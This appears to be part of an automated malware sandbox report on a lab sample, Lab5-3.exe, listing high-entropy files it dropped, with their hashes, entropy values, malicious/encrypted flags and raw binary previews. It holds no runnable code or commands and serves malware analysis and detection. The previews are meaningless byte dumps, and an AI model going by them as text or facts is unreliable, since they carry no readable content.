                                                                                                          SSDEEP:192:6TIjbGqoGScv0yV6DRMX6xJflJFFktZl59AydRIyu0xBmKY0Cb:64/oGrv0yYRMKnljStZl5rZxBXYtb
                                                                                                          MD5:93CBD1875EFA537D684F87AF1BD0FDB1
                                                                                                          SHA1:F703FDA31B15364A268B283CD41D60E376EBE8DA
                                                                                                          SHA-256:E41FD7538B2F12A3410658CCF99B0B9CE05396AC6E42154E98E842F93CC16F74
                                                                                                          SHA-512:6FB99F7C009985BAA2A2C1F841B09E3BA8F2FE7B3338A0C0F8F4BC402D8010AA548ECDA3D4D42C2B73F9043A9397D71CCE8506FB32AFCC02AAF0700FDBBF1520
                                                                                                          Malicious:false
                                                                                                          Preview:&RI.oG.."L..".6k*....20A...C....,..a..V..*.>T....b+U....;.}.e2Y.j..G[Cz...\"av...J.@y....{...?..q...d.H~...zA.l...~N.:...2.....`.....k..]....mN...u.>...d.......K...xv+G..N...~.2.....l.Ka.<M9... FX.G...=Xl..;P...c.<.u....O.l.4..\...'........9b..Bt...p.n.....V{...L...d..W.1..Aaf.d.k...~.....\..F.X*k.....G..[T.'2.......m5.0.N.N..C<N.....w..}....Ku.w.......J...G.F.u.....z.`(.Zk$.....1...z[9.k^!.......Q./../..T8.2.L..6..l.c.gM...z.V.(....,.........\..$..E7...n.3Q..O.......|....<1...Tu.5b....Z........f...AR...S...W......I.G+..TxO.f._..&NF..f...lW..I..\........s..c0..d.,./^..3.........K.5/.]...1.1..(.~....>........p. ..v..+.P..d._...u..1)K....u>VE.;..@.E..Z@....D.X....sz..".'......TYh.x.....Fe.D....G'.l..n`...A..l.:.......>..w.7j'../...B.....P(4.^...|a/..>...V...Z..:.....{.{...(-o~t.z..'..f.f.-.Q.r...teC.=;.';U.(.j.PH.)..1....]...[.....A..,Q.Nt..hG....>.8&F.....x....([.q|L..wk.I..|DO...z...)...g..g...9T8P....$n5.F.J...].B@...W.;.Q..n.!a..T.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11312
                                                                                                          Entropy (8bit):7.9813464803611405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:kE73Q6LK+YxZvts02cTcHyYTmuabMDWP5gkrnhS3och2J2J9o3qOPNaasjF/z0Cb:kE7g6LPYe02cmXTmurDw5g6nhy3JtMQv
                                                                                                          MD5:F039898D9B584E1F06DB2514AAC4D3AB
                                                                                                          SHA1:8179503D5E02A86F921B115A656ADF1089ED195E
                                                                                                          SHA-256:B7414ECAED4EB888584F87EFC68DD43BF6B2F7CFB97D0000DC35060042E0F6FD
                                                                                                          SHA-512:46B665F9349EA499BFFA90745575267B40F190051C0E66271895FAE17085D74F6B5057E940150908C92D4FCD473D03C5B3BF8D1045E5E46753B262EB5FD78721
                                                                                                          Malicious:false
                                                                                                          Preview:...n.1...=...9..H..|Y..LP...bG.ci|Z..B.Rs.9....,.6..x.rp.*..&`.M./...........O....R....r=.7.X....e.b'U|;.Ki.P.T.|...\...:.2.n'..."N.?....@.&s.!b...`..SmA..c..bufaKC+b..T..7 ....=...7...O.+A.+>.k....j..z.v..x.......r.@S.\.7....*..u.8../E<...f.;..e}.M:.r..p(H.f.h...f..@uz..D...."v..%@.....Beb^..D.....!..\=fZ&...=d..k..6uj....=......N/..bH....b~.........U.dA....j.!5..{.......{......"V..P...7..D.5.+Y.....t...-i..T.T.3W.I..W.-.J?....K.?Y......]D.u...x.c.....,...^..".........S....|.=czw.p...c.X<x]0.K..(.'0&k...\.......P...m.o..d.wWS...:..Nx.A;L........:..E..s..^^<"Y..l&.:sm..ju..6.i8...7.,....{..../...TOJ.`.$.].....l..;i....F.e...n...,.~..F..s........jR.._YTW....pT..T..b.Qa}.).i...f6Q...f..n.T...j...S6....[]....D...`....g9s}..b.....`a.jt\.|%....m"Mh~.c..fZ&D.M....0...v./.....%G...X0..4.+.+.8...x..[c.....U..Z..+..;d&*...x'....*.....#..{.+z.V......c.]...!?.l...s.S..D..I.Q...$M2..`.(.cI#Y1....+.&..n...j..].}.Q.....O..D."....c.o...]R..x...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19760
                                                                                                          Entropy (8bit):7.990915056335741
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:EHIsfy3FobIoH/94/qrn6TDBp/n909gSI3xcAKngRX51Qkutb:EH5fyG/H/9aq2Bdn909+isXXuZ
                                                                                                          MD5:89A003BCB77413CABF6359214591B5A9
                                                                                                          SHA1:C0F7E593D3A7D17927A5897492B3C01BA08D5721
                                                                                                          SHA-256:310BABD1F205362DA57067128990D75ABA79A530D68E3EDBFE698051ADA6AAEC
                                                                                                          SHA-512:F3E5FA8A0A8B1904D2088F23ED33EC0E7F98B4718C5D501B990FFF4D256D4ED7C355E22F91EA1E935C738FC5D1D3B4EC9188C668728D38AD96F04BD6A1F79BC9
                                                                                                          Malicious:true
                                                                                                          Preview:.Z......%....o|Vp........._..n._.8..(H..5..z]..E...c..9XE..x.....b.-.Bz.....X..?`D7_.j.r.+.G.*.;.C.[.f..2)N|X.qY.*.B.Ex\..i. .U?R.^:..8s.-L....mK9..=./l...`.j...(A@d.......|...../(g....y..A.m.s.#...`H...YP...P.4K.......<,.V@..._.>.s..J.$"d>Y..Iwo)....IyD7P]q&......w/....z..7......8.-eTX..;I:..Z....I.~}3*..s....oPH.....k..At..J........U.../../....0..[P.Gj...um.4..R.v..%.......5+..J|..%......iy...qb.9.7.Js....LpV.6Q.p.X.R.......,.j.{s...57.^C....W`K .;#..G...i.....=.h...S......e....].&.D/.]z..T.:.GU..../.H........$k...W...,h..]G`.:Pn....o.6.aRwcq.....05~......;....f...}x..JqB......8..(.7.ezy....z|...F.....T.d^......c.KH..-...f7..v.Y^Wk.K.[.-.*.$i..k..S...../..^.p.}.zP...<.w|....w..4.H.9^y..JY1.y...2.u...Q..Y..y.....x..d.I....S.........h..(..r..3.W...).ee.Pi.r..x...v..h..o;f|..:.3.0;..y...q.....rr...(]LfF..h...4...Eh...pJ4W..?....A.@G...j..uc\...(..Z.o..LCr.}Q%9TP...#..:...m....>!.%_.".&...:(..T=.P_..P..AS..cO.:....]@\.n.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9664
                                                                                                          Entropy (8bit):7.981288762737594
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GDbM45CFVcLPXUx43H98141zuTNgxnKU3pWvlRUI2tTkxNmCdU6A0Cb:9459vE43O141i5En0vlRU5tTkxNrOhtb
                                                                                                          MD5:9F5E2926808EFFB82021E9FB6E209820
                                                                                                          SHA1:DD06DAB281D3281F4479772AC4B6D5BA6E057178
                                                                                                          SHA-256:08FE898EBBD038EEBB023FF2BDBD6127C3EFC2F3801024B4427253C0C3827CCE
                                                                                                          SHA-512:38822A7896F5BD3A16C1842D0D547D29A0BA324FCFE842BC2F142B05C066B7E02E222BB1CEB98FEA1BDA95A2DD0ABF453ABE98DC280C5AAA1EB2E20A8DBA9769
                                                                                                          Malicious:false
                                                                                                          Preview:fO.....7...[..b......5..v...am6q5...P@..R....i....Z*[.F.....]..b...Z..a..!.4..|@..%...a<$...|...R....Jh..{g.;!\.Af-,h....MV.x..!W..>aX7...Q.. `O.C.B......K....y..*...].Q.s.9..{..*..<uF_....a.F...#k.H=.......c~...6*...{{.d.n......[...X.l.(e....dM.G...H.. ..of.|./...F3Q..m....18Ct.0.....4../K....:fm.{....._?=.M.A..X"+H.....M..l.u?L.... .j?3J6s.~........z..^......05U.6Z."...T........~...r`.I...........;.._tJ..R..6.V....`....W....02.....w.....C.S.V..[1.x...2E..........d..&..g<.{.;q.].a..~x6.Z.;..S.].E..........ZP...L...G*-.s...n..1:e1..1H1..4*.e.E.....`..OuL.(&+v-py...Q.......1....m.:.H..[.L........1w..^..3......p../......>).Z...U.~..Eb.Q.!]1..T.T....&!jN?.....S.......qr`.en..5......V.}E...+ x.,.9..;....%.Z%.Fs4......O.8..>R5.I.....j.\....K...f'.^K-.a..%9Xd....c..B...r.....u..............Z.d_(.].....#.bu.3.;..................*..au.B.li.........~..[3.F.l....V............8.%..Lv_CB..}...B...Ha..x..L.....I.....9'.D......Z+'.6..."..._.....{.m6.._
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11856
                                                                                                          Entropy (8bit):7.98467462815236
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:kVq9FsfeCc4VHuzRX/Go2nVNyXKcrVCJXUQtNwoo+yx+MXXtGRND+AvRp35i0Cb:fs2RUHuzp+owvyXKVUQUoofJX9GbD+oE
                                                                                                          MD5:8A3299472DA9C0DC60DB72DADB072A6E
                                                                                                          SHA1:578381BBEB5C585901937E9A26BEB5A4CA3CAE70
                                                                                                          SHA-256:4F8D2394489AD93BC8F10310D5C0B219679269E2D081E9383B9403DF18F59FE7
                                                                                                          SHA-512:08EB91B5F6E7445CB404B13AC799AA79C7D6F9CB7EA971004A48F9D84DBD05E56EC1ED6D4EA8FB192105D209C33AF0EA3B7B33AA30C3EE1D2D4E3AE75D5D42AF
                                                                                                          Malicious:false
                                                                                                          Preview:.Bt....b..<!c7.B..FF...+....T.m..Z..... j.1.C9E...p..H..0.%...h.V...Y...V...=.E@.)j.v4.L.7...^.."..(..[~.v..?...W.....V.....Ef...+..~..,..PuHK.l..-q...o:..^9...k..5z...'.zP...tG.VH.x.7....rqL...^.I..X?(.c..?X.D.IP..Ne&pHG..>P..>|.O.#..S..T^b..3C:....x..X..Xw.E4%..~.=.3.X.F..y.0DjC6.sdU..v..N.0...7..Jk........)x&..~.!.^....~...C4.i.4.o.......~.......^y.z..r.m]zH...c...y.1.....Z3./...o...H.....C....S....A..$....=.S..{... .6..iS.._r[..wk.......-h.>._......._R.....:S..u.y...CR.~-..(..=;Ln3..|.x.j....u.,.._..g..<>..1yc.<..~.}.\].....3W..E|.6.Y...aRu...Z..H.......VS...~3.....l.e<,.RC..d..1..s.......|..)..q..'....7 ........|x"..3o....&..#... ._:.{83.*..G..Ub.....Z..0..........D....k....l....z...\}.|^......6..Y~.[<V.4....._....I.^...0Ca.7...kF..+..U.....e....x.[Eu.?.t......K....I:.p...+q ......v2z...?#.y..#z.79....5\...6.....,....M...;....Is43.....v.......+..N.F..e..x'....R.U....`@.B_.......XF.w#.......g].y.y..&bX..z>.....<.H.@...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13904
                                                                                                          Entropy (8bit):7.9868861470979375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:7Q1WlHZQ7gK9SObd5/lkI8GerzO1GIAtb:7WN/h/C3jqAZ
                                                                                                          MD5:B38D62C253C292CBF77F03DAEADFF526
                                                                                                          SHA1:AD1C78CF3D996BCC443AF4BA904C3A06ABC6E91F
                                                                                                          SHA-256:4B431EAD89292B04738C6CCA6EF5BBB33B22D700B0928F7937150990FBBDA5BA
                                                                                                          SHA-512:D5B1FB97D5AF23BDA13A040FEFAA973FDFA596FCB8137293415073B3DCB89F9609E952FD145279131F2FCC056C4C4D267907A46A8D56C503B79069DD49750744
                                                                                                          Malicious:false
                                                                                                          Preview:...."=..._...rq...G>y2......a.~....(..r.&....:R.f......T].....z"..pT).1zeU..#..j@:....n...I.`T..>~....zS....v#u=.`..'4J......XQ...C..qQ......>...t..V..O..7j..n.....b7........&...m.j...L.n>`..h)..X.+).%ij..y......{J}t..6Z......A.{z..k..-..?x]....a...Pu.`.3l.......}^..b-.K0.$.|.:8.QzA....b...#..Jn.!.SB.o..........U.#......s...(.${.F.. +>..g.._y?.....h......s.$.L..i......m.A.<R.2K.w..y...@../.T......$.:.$...inTb4.....K..>H.g*..y....R ....9-A...o.%.%.&....|i...h.^|..b3....).W..H>....._.g ..Y8.`..[...1.K[..fm......U..e#.t@........}.....%.."U....?..v.F...u...,.m.V...Iqx....r.X.A...1Y..........H..s...r,.fT4fX.x..y...da...8*.!..}.....]b..anq..c.D.Q.Q..TR2.H\5...fs].....9.jF.%Q...5.....!Z.1yR=9)N<.R.W>.).:6...md...u.....=cG.....32....%......V.K.n>...I'|.yAA...Y.....`.^{CV.0]...P.'..n..;S.8.).n_.+....?[+.o..h*.Z.6.6.c.o....k[8R.g}hM....<|....LoZ..x.t.+$..E..{..H.xx....*.t$P..1....k0.....T...>!2....M..`.;..p.....0..Lm..C9...F.g.....l').D.p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7328
                                                                                                          Entropy (8bit):7.972962906599239
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:cvrsVcMHkYGRk6c3nuziWeDAzYHDOj3u0Cb:QrsVcUkYGRk7XuzVe0UHKTutb
                                                                                                          MD5:C5B9A4FCFDB4EC0DBAA843CAE6AD77A5
                                                                                                          SHA1:08F79FEF393BE9F79AC41E0BDB85CFE5678629D8
                                                                                                          SHA-256:915E904D7D029B3D76CAE6FBE4BD384252D38D5D86C6AD23A6A49CC2BD065C40
                                                                                                          SHA-512:130E30E055215D2535E79F9024168076E613A2E83CC15FD7AFECBA7D962C36311ADD67D30E706D1513115F0F7B5E833B5A83DD020489A68DFBD054C69D710D48
                                                                                                          Malicious:false
                                                                                                          Preview:2....e..q.......a.1?.%..s.T.U.]..X.~1F.....mp...b....&.l,....N..^w....bx./g'M.....h.Af\!F..Un.p..QE..#..K(y\.T..N.d.\gJ...O.]......{...b...;T..oZ..E.i..f..1O....yU..........A......A..+l.G.....P.6..iW;..tY..[.F.A5%.t...x.4v.@.{P.HC.......1..OS...c8....p.Ik9...w....J.a.p..S..+m.2f[.U.og.*R../....W.(a.m-.F..5.*...o#.e.\..4>6.A.......d.Z.W..o.euW....S......../%j`!..k..}a9+.Y.TUeij.....Z.d$.G.....x^.....5...l.......P.....<....H.r....U....(...)p...#.iuT./;...kU.+.../....g.&...R....{w5...~Jx.....c..S4f=.$...w..6)sj.x.+..1....*]@F'_0hS....)......}....C...U|Yne..)S....J.i..=7.3vSI..4).@>...q.[.H..i.(qV..8.).O..8..... \.q..I..T'.BO.....|..<...'@.......c.7w...J....yH..o.._.@..../(....?.6N.._n.Gg.?^......@.....L.....W@.2....y....u..%y...M6..;T.........+rHTJl.c.u.....J^..h..T.....h..[.....y..2`.Z.2..D9..%;.]..E.B2. ..Z~d......u9.KW.I.P..{N.)..3.r...y.C....0.....kg!.....:..w.....\+k..;.1......w]\z.)....I..7?.u'..H...O......{.[.c..*......|..S....^.K
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14016
                                                                                                          Entropy (8bit):7.986323914119482
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:krmWxXOCkfO8juuoHtNj2jxAsY05KLmSD5Xtb:kiWWO8qu6QY0LeXZ
                                                                                                          MD5:11D383C919F4CFC664A18DAFDB872A63
                                                                                                          SHA1:350B26C7BF51118A29EFC36AD7B4402CEE412326
                                                                                                          SHA-256:720D3E502500180D346933E657B7D96049900D268D3F95EFA0040003C072409E
                                                                                                          SHA-512:9FDEC03D65B4216457D7C58A06314DBC846262300E6EBE806209C440234689CF934C8A794129182E24AEF9B43E71923CCEAFAA09DC2893A0C1A651060F95D712
                                                                                                          Malicious:false
                                                                                                          Preview:.i.tr......J)............%...W90>*.......&..J...h.....k..C...R%K.T.}..}.8c.&.B...C.=..Qs....:..;....w..8F.:.4./*..|X.....5...2..k...e.........FV#.LC._.3L.+...{..#u^..J..A*.6>;.kU/.......c..($%f..).B......6\.._.N....:Z.`B,..J.(..-'. ...........p.lO]._..t...x....._.k5.A.G-.pC.w.B.. .c.I...R.4.....#|$%...M.8..:..........(.....x...T.O.E;J.9o`.....JA..........@.Z..}.J..]...BQ..o....2S.\...~..%6....`#......3@...<..[.yzs#i3...N.40j...{..k.(.5..]@.6hYj..!.|e.l.\.....lQI. ...........o..?...p..'..BH...LW....z. Pq......f...b.M..=.a...-...6zR.....!.l.....T.+.U...6.)@v..........i.@6. ~z....L.B..yA.;K/$..d..*.x......@.:.en...S...?......V...H1|R.G....;H.A9pm...x..hJ.[.......%...la.fFa.:.....q.y2j!.n...;..z.>.m#"7.AE.q1..P..*..k.1; +.C..q.+...j..7u.N.@R.....[...L....n=..u).[..z}.((.k...6.k...h!.]..1.X"'..<.3.|......B..).<...3.a...w..F.Q.=....7....m...6......]/..-_.G.).-..v......s^?.n..z+#....EjJ.[h.]wu.e. .F.B5W..F...._4......^...7..)...KI]...C...s..8.......LT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9440
                                                                                                          Entropy (8bit):7.9775513468375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Uj5T2liVP8tVAOfWgP9kuCwCoXL6ijywovGwf0Cb:G5siVPbOfWgP9xIiLtj6vvtb
                                                                                                          MD5:E30DDCC9F7D4C7D69541414EB9C55F14
                                                                                                          SHA1:B18E3B549FFE5761AE3A6CA1B157D5631B7C3A35
                                                                                                          SHA-256:43196CE837A8FE9E1916B80303C3439AA02BA496F71CC65960CB271893D2C368
                                                                                                          SHA-512:B47CE587BCB452BAA241C5F00734C90F6AA8F51E85D4FAF418192A4A4DD440856A7443F0986A3CBC70A9A528859FCEE62C93056DCA889C10A2BDE8E3AE0FFCF4
                                                                                                          Malicious:false
                                                                                                          Preview:ML....d? :.-&T-.......{...Y.....J|.#.L!...,.%.....b.t.4..K....GV....<8..{.rA..@.X..............U.....VdC..kip..pLLN...&.....yFJ".h...L.../.5mc..G..O>.&...........C2...5..........).........7.Dv..Q....$..,.....f;.~!.T.#......W........i@...8s..4O...VN-d.$..w.cX0..8......F...t'*....tV...+........f...{...lG..Hc.ZR+*4...JC...~...Z*.W0=p.".!..x{.a......R#1....vgc...~.F....#..O.,.>.3s.xv.8Af-.....5.0..j.AL.../...+.x..my....#W.... ..Ye...f...*JP.2.*lD`Ol...8".\i].!.6-`.0.e.I...+.AD#0O.&'I2........8.hQ...FT..V\....]......$&....l.M+..".0.Z......P.G...=......n&i.>...Y...GVP3..h....WO.!Q.n.._:..."..%..&+....x.D=...C..=....p.m.7.Z.}.H..=CL.I <V^..-.ET..........G..Nc.A.t..d..'...`......z.8.v`7....n6......<...(q..S..CU+....V.t.E...;....x.+7..g.~u.n.......O..f..S..7L......Z.{.M.`SJ..%.Ft.....O...~..ty.Se'".r...$.>G.p...w...{..X7l...0..z..6.....~..0.....qssQ.....*h ....o!.k.^.RH.E...C.[.g....6R.j......D.Vs....^_....5....B.%..W...nr.J..g.$=.h;{T...qI..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11088
                                                                                                          Entropy (8bit):7.9824941432368375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:vYqu3rOHgbyt64jUqPNeMBwNthwXO/Zxn8h8s9iKzvRauGKYSBQylL4TNDKXEsPs:wrr2gEWqvBw/hw+/Dn8RzauVBVL4dKXW
                                                                                                          MD5:83AE8A653074852ACF97121652D2962F
                                                                                                          SHA1:7A9EFE8FE8A9BA9B7884D72CF5A1B62DEAF005BE
                                                                                                          SHA-256:5B6071AF2B974BFD0AEE46BA586B9A7E030B4C325D17A7BC99CEB88936CAFA18
                                                                                                          SHA-512:26AE2173088078A96883B9AC544B8E0CD134C65EAA9557516D618FAFF36AE56CFB09ACEA5CC8D7C1A51AE5145BB24A02D6A4C2B52DB79779CCE9EA7592035ABB
                                                                                                          Malicious:false
                                                                                                          Preview:../...`.s.H.k........ozy...=.....n....&.J.p...\.{.....M.B.<.4m.1.9.R.(...!..... .?b..&I'o...A.3P...w.?g.J?-.;.k..*...p.&.`....|d~..r...z.Y.>c.'.....|.;....{.n..HQ...C..HGL..8L.w.;.B.e.".b..+.......r.].Sm[Q...).......\^.....@...g=..dbZo..:P...8..../@%R.^.)Q.j.u....':.!+.....t.T.EJl..q"..V...O0...;..~%...c.#.;.;.K...QtnB.H@..%..C....j....z..dq?O*..W#mr.?s.W...0.AF..r.1~.Y..e........@.4.G.)'........-..zb.1Z.....k.Br]Q.CD.5....M......O.4..o..s....Q..r@..\6r .......?NX&P.D.......dY.o<...... "}..<Nn.I=sW.[Jh...G....A.7.?....'...V..a.9..T.....J.H=xT....x.!..kx...}.v....A.La=..@D)....-.;F.G.....Q.T;e'...[.......W..6..........>...f.. .;....d.`|.+..;u\.W.6.....YoGe.C.?Yf.f.g*.........c.k...b....<...r%.-.}.H^ln...K...PX.#/Pm...%.1D.....H.~...%...bS....L..e...q.G.qT.#..X..w..kA6......... .r...b#.}.s...*sSo-22jR.O.}.Ly~{..`.P..E.R)..{.84^...EtS=...Qz...@zQ.!.3k.QuM...L`...8:..#...>R9.E..ag..).N3S....ps;.n.).l.'.J.....i.7>.&.(....!D...f...~.......xD......}.|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6976
                                                                                                          Entropy (8bit):7.976815561136028
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:M2AfsgxXF1SYF57RnNsBRkM/2CRMTvbR1E3BIH7giTJOPjbAbURQizdNEU5yGx0a:C/xXr5RnytOCW3IwwPJH0Cb
                                                                                                          MD5:BC9A6D69B551080086E304A171791465
                                                                                                          SHA1:5D6412152A2402ED08DC9E2C09C0789653F6B1FF
                                                                                                          SHA-256:818EFE0A19C4A2F8D06826EEC05E3AC86A65C0D6FC6E373E02ABA5D84F2BB6C2
                                                                                                          SHA-512:43B851B7CBD84F2678B98D3759383C878C06448C7C4469B8B3000FD8708682C597FDC075015A6CF76D825DC2BC67451AD775159FF49734C07ED4D11DF7F27A46
                                                                                                          Malicious:false
                                                                                                          Preview:.H.<#..W|F.....$iEsR.i?l ..qy<.............g....Xo..s.?..S.\.WYa6.......'b.....:.....[......t.8..E...6M......e...........z..9.<.R...w..O..hc.'a.q.....q?k.c.I...p-:...U.....).8.&-Tg<.....r.3[.OSj..uZ.p....*.....)].Q.z5....=.J.ZWu{S!,c.....C.....L....f.....z.6.....l....D..&...^.l.h.....G....M..WZ.dN.k.).....!...b..W(.J..%.b....".q.....(...~....r~....{.....F].+....%...Et(V...._1.w^.F.AW....X.....6.Qr..3+.nB+5j...j...3..'.Xl...z.<`fs.I...&.Z...M..{.L.v..N..O.i...".....7.k.....o].rV<Q. o....w..F.U1$4+`)c?.o.;...=..+...k..S.~....8.S.~..k..i..6.*T..++..........E.o5.cr.gU.}..!b|.....g....;s.U%... F..*wJ..5......O.h7.....V.jg....=.5|..M...O.o...B{K.|Bk...(l.e..r.*...J.g.....e7.....?.~IT'+#.?.....w..?.4.]}.......h.+.3..T...+.......#........`.I..W(......S.I]....8q!8.-k]..Qt3M.).......u.#x....XE@.z.........Ju...^RR..6...G"...)...N..O0.'.L..+p..1...P.fS..n.I.......f0..m...$.%.*A...Q.j..v..Y..-...l......r. T...n..............N.....}..\7Od.x^i'4....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10320
                                                                                                          Entropy (8bit):7.9809586558827466
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:cWkkb95PynhcdinpaFB38EvmdyzhmY11b0Ew8WoCWTIXVi0Cb:tkc3ShcUp6PvdTjAAequgtb
                                                                                                          MD5:080B5B527EAD262E0D867663DE28D444
                                                                                                          SHA1:631745AC6CAF289C0FE721C7A8D5F81985D1ECFF
                                                                                                          SHA-256:4B414AEFEAC6F2AB43BE8E691EC531A3FC28F841DD9548537AC295695F31867E
                                                                                                          SHA-512:C204E8732E6DAD44AC4C370BF1CAF89B7FB68BE3D81DD484BB7BD99BD205F78015D85D34DE546922DFC5702621BA0D5B4ADBA1CA7BF60E96460A4822CAFA8E6C
                                                                                                          Malicious:false
                                                                                                          Preview:...m....7..WD....{......J.....=..A..W........h....I.D?|2l.Gp...|.x..m....#...wf.K2X.'s..8j..z...x.J[.4...2..............$/bo..[..#...%....p.../~E.<XDRN....).bV.2.&..m........{.uu~...4[....(.5(..a...6~.:.7 .0..X*. ,D*..t.{8).}....*...?%]...E>V.?FED..uz?.b..m..p.F.".IVZ{*V...`..:e6...EN.1>..O.....6....19.$...^q...q.=.,]...A.....`J..R .!W........G....^ .J..h..T...).?..!`;...~gd.4.Q.Z.i....1r.?..$..?|`..)w.#.Rb...xC..e..8.-...<...!.O..A...S.......d....o......j.*.o...u...D]..a}..g.sC....{L.-%..E..R.>..U.C...m..@B.Y...?.x.....,=.g.Wl[v...T....Ga..<..7.02k....?X../..x3...h.w..{.....[8.G.....[>..).!Bs.#%..9...E.,...n..V~g.IF..2..;..}.....T....%......b^0...rs^....t?uR...O.P.....<..;.Dg..(.I....S...;..q....N`._..3Q.-.Q......x.].M;..#.N[.J.6L....g]\..h.B....s{....H.6T_..p..........@^.....\ ...ZRb....9B...V.Y.W..8zX....s..t...5.-g.....g.w.K.lz... *.. e...8)...x.........u.t.!.. .....9..D....<......j......!.X.5x.#|qc.3....1....c.c...dS.._....{.QVI.....S..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10032
                                                                                                          Entropy (8bit):7.981766701009179
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:BpGyoUxTDLieONJ3iknPYvYK514O0V8ZKBqpQiEvu2SlE/U0Cb:Bpe0ndKykPIp0aZKBqpnEvu2CUUtb
                                                                                                          MD5:0A0E036E0BC50630384D00D75D17DAEF
                                                                                                          SHA1:93BAEF23F3D6554AC5335301BC7245055E4237F6
                                                                                                          SHA-256:9EFBA906696E6AC6E1D6538041533C1472ADCAE64E6BF68AA80BE632B49623C3
                                                                                                          SHA-512:6FBDCD1D76C679E8259EF5F416E2C6A7AEB0163BEF5953C326EACB8E38ED1ABD3F045BC30B1CD0D8865012EF85A2C273E8EE28B6B18283EBCD04BE9B72FACF5F
                                                                                                          Malicious:false
                                                                                                          Preview:./...1.>v....v.-.....&<.#..D_R......lFX....dJ&............2....8...(.#h.F.U.._..n......8.L....X...Mq.u.@..=..Did...........l.-q....yO-...?....A...x..g......>u.9W.~.\pc.....|&E5.Y.@.&.$/=.....*...Vw..VM."N...f.m*...{\....<.c&..)....A.St..:.8...:...u.....sD....{>..?IV.oy.....m.G.....Mlw....:...{.*.8.p..IL...l..;.K...G..LgS..aj...O.k..p.."*...U...r."l....s.....K...%...0.g.)`C....4...N.fVN.e.?.X>...../.A(...-..L....lE..>3^V...W........`....XV..O..$3......M..4...(:N.B..(..x.lV._(/..+.......$<i.o.9A\#xw@...DXy........g...A.>,,...M.|.x..eT..Z{E.t)...Q.>....O....'.?.pp....1(....5.5RB.=........;.gW..9[........".WI6.\..V....f.>s...e.....!V...`..9OW.o...T..8.........7..a[..3...$.v,@..)6i......D,.k.j...l.A..`......V..4..h.c.b......k.eo,/.F.`K.*....g....wRE.#Sr........W.g(.. i.C1.G.9..Q.a.!.<...H..|E....b8E.p.:x.X..HW..T.}.....\/......x.1.i.vS:..?...R..0.0.".p.F.....\N;..&.../.....&.....;B.N.O[.......X...QV.-.., ...X.L....p.Gv.HZd%..\..v..&a
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21744
                                                                                                          Entropy (8bit):7.991582779800424
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:xu5H2DCdorpvchGrMyn71xXRj+w/3gkn3BgYhwFroQRPNzHcxqVYTU9etb:Y5oCaGhGg2d/hn3CFMQlex8YTUsZ
                                                                                                          MD5:1E6D93681D8E336E3F1236E801730E6C
                                                                                                          SHA1:B14E43E7C252A01F1A17405CC36E1998E9B973C6
                                                                                                          SHA-256:BCC405EEDE9CCF2DF7A0B263EED7F05B78E245C592758CD38A1BA8F88426BDF5
                                                                                                          SHA-512:166301C52E81816183B58FDED6F01AD2CE8C8773280003250F2F6B9A4947B10ED3BC0872310FDC8758946BBB5938D0AE1C8CD577747B00AB5693EC165200A4F4
                                                                                                          Malicious:true
